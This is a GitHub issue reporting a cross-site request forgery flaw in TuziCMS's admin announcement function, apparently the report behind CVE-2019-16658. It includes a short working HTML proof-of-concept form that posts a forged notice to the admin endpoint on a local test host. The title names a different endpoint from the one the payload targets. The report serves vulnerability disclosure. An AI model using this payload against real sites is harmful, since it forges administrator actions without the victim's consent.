tuzicms /tuzicms-master/index.php/manage/user/do_add Cross-station Request Forgery exists in the place of announcement management under conventional management #4

HLHai · 2019-09-03T07:52:11Z

0x00

Cross-station Request Forgery exists in the place of announcement management under conventional management
url:/tuzicms-master/index.php/manage/user/do_add

0x01

payload：

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/tuzicms-master/index.php/manage/notice/do_add" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="notice&#95;title" value="hacker" />
      <input type="hidden" name="notice&#95;url" value="http&#58;&#47;&#47;www&#46;hacker&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

0x02 end

The text was updated successfully, but these errors were encountered:

dvandra mentioned this issue Oct 2, 2019

[javascript] Add CVE-2019-16658 fabric8-analytics/cvedb#6068

Closed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

tuzicms /tuzicms-master/index.php/manage/user/do_add Cross-station Request Forgery exists in the place of announcement management under conventional management #4

tuzicms /tuzicms-master/index.php/manage/user/do_add Cross-station Request Forgery exists in the place of announcement management under conventional management #4

HLHai commented Sep 3, 2019

tuzicms /tuzicms-master/index.php/manage/user/do_add Cross-station Request Forgery exists in the place of announcement management under conventional management #4

tuzicms /tuzicms-master/index.php/manage/user/do_add Cross-station Request Forgery exists in the place of announcement management under conventional management #4

Comments

HLHai commented Sep 3, 2019

0x00

0x01

0x02 end